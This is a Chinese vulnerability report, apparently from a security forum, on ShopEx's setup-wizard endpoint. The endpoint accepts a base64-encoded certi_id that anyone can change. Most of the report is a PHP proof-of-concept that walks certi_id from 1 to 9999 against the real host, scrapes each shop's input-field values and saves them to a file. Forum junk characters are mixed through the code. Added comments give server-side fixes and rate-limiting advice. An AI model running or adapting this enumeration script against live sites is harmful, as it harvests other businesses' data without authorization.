|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer base64解码为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php- B8 {6 y( o: Q4 g! |3 M
// NOTE: forum anti-scraping noise is interleaved with the code in this listing;
// the PHP is the tokens between the noise.  Kept as posted.
//
// Enumeration loop: calls ShowshopExD() for certi_id 1..9999.  The wizard acts
// on a client-supplied id with nothing tying it to the requester, so walking
// the id space reaches every registered shop — the insecure direct object
// reference this report describes.  Defensive takeaway: the server must bind
// certi_id to an authenticated session (or verify a server-issued signature
// over refer); many distinct / sequential certi_id values from one source
// against step2.php is the pattern to rate-limit and alert on.
# e! ~/ w( Z5 h+ g5 J, {; O for ($i=1; $i < 10000; $i++) { // enumerate certi_id values
8 |( ?3 N7 ?! l; L9 H- Y, P8 _ ShowshopExD($i);. S J3 B% X# Y. m* i$ O
2 q3 n; e: Q- O9 }7 V/ d s
}& s$ e0 f1 I8 O$ k6 l/ h" E5 V
; a1 Y. K0 g8 N" v
/**
 * Fetch the ShopEx setup-wizard page (step2.php) for one certi_id and dump the
 * name:value pairs of its text inputs to stdout and to c:/shopEx.txt.
 *
 * This is the report's proof of concept.  The security point is the refer
 * line below: certi_id is merely base64-encoded inside client-built JSON, and
 * nothing in the request proves the caller owns that id, so the page serves
 * any shop's input values to whoever asks.  Base64 is an encoding, not a
 * secret; replacing it with another client-side encoding would not close the
 * hole — the server has to authorise certi_id against the requester's session
 * (or verify a server-issued signature over refer).
 *
 * NOTE: forum anti-scraping noise is interleaved with the code; kept as posted.
 *
 * @param int|string $cid  certi_id to request; coerced with intval() below.
 * @return void             Output only: echo, and append to c:/shopEx.txt.
 */
function ShowshopExD($cid) {% S& w5 A; X, T8 x: Y! G- ?! U5 Q: ?
2 P7 N8 s" m- \+ b9 F# Q $url='http://guide.ecos.shopex.cn/step2.php';: f6 j* z- a. t7 u' W
// refer = base64(JSON{certi_id, callback_url}).  No MAC, no session binding:
// per the report, the endpoint honours whatever id is in this blob.
/ J; g$ O- p: P# ] $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');; C+ g7 s) r9 d7 n
2 Y' f3 a. t' Q" ]* K $url = $url.'?refer='.$refer;/ _; I- n: g% s9 F( N' h% h
- X2 J/ j" a' F. n8 c* F $ch = curl_init($url);- V: j) ~$ n3 Z
- u( E8 I2 Q! l! l; L2 @
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
- r$ u+ b) F4 A' w* U
" t; }+ o8 }8 w6 ~3 M curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
+ {0 ]# U, v6 b( D T
& g' r2 Z" M( s" J3 y4 u! N0 X9 Q $result = curl_exec($ch);' \8 R9 s0 m; X
// Response body re-encoded to GB2312 for the console and the output file.
8 _! z7 o/ p2 b& |2 t $result = mb_convert_encoding($result, "gb2312", "UTF-8");5 Y7 D- _' R5 R3 h# y- n" @( F
" m" h1 W5 c: N1 a( K/ s2 Y, o
// "Hit" check: presumably the wizard echoes refer back in its HTML.
if(strpos($result,$refer))
/ j' s/ W" _5 q, O: U+ c( w2 A7 H D5 e! W7 f, }% K" x+ Y: s/ I G
{) Q+ F- o7 i/ F+ g- M# I" }; U; [* R: r
4 x5 L/ b5 C; l $fp = fopen("c:/shopEx.txt",'ab'); // append results to the output file
* ]$ Y" Q+ Y+ w: b
// Every <input type="text" .../> on the page; the attribute string of each is
// captured and its name/value pair is the per-shop data the report says leaks.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);6 v( z0 m, E6 a$ o8 \
; u& b4 m6 ?) n( \, D
foreach ($value[1] as $key) {
8 f' ~$ U% p' G1 u9 K9 k6 H8 l) I7 |3 ]. k3 A, O4 M7 I
// name (group 1) and value (group 3) from the input's attribute string
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
* y2 Y, ?' p- ^0 Y, D' u V7 `0 g. C \$ u z0 F( z4 N! e
echo $res[1][0].':'.$res[3][0]."\r\n";
' m7 A. p5 U0 U1 v: U4 R& d8 w7 w) M
$col =$res[1][0].':'.$res[3][0]."\r\n";
7 Q; J7 T, l3 T. b3 L0 V+ N! v- H+ \% U5 g# ] o
fwrite($fp, $col, strlen($col)); ' P3 H+ u- F; \7 a% p; K
$ @. s8 @2 ^! M6 M$ f& C2 k2 J4 R }
9 A3 p; p0 z& K. |
// separator between shops in stdout only (not written to the file)
6 e8 @2 j3 A3 E0 k4 E' p4 x echo '--------------------------------'."\r\n";( X! A" v' s& A1 b, j
# r; e- M+ h" x fclose($fp);
1 _+ `/ o* f; B, m+ g) j
1 v$ b3 j: z$ F# { }% g0 W7 n& ~: X
/ w" L) h0 S( p3 S+ l flush();
% b$ o6 |% W# K% i
$ b) q8 {9 C* c' M8 T; H) p- ? curl_close($ch);
2 J$ ] N+ i0 P4 Z# M
! `' j& t1 \% T, {. [7 z( y) b2 m }: z8 U2 ?0 Y, \- n% {1 m5 F3 f
. Y4 ~4 a9 s( z* h
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式（仅更换 refer 的编码或加密方式并不能消除该缺陷：根本原因是服务端未校验请求方是否有权访问该 certi_id，修复应在服务端将 certi_id 与已认证会话绑定、或对 refer 附加服务端签名并校验，并对 step2.php 上大量连续 certi_id 的请求做限速与告警）
|
|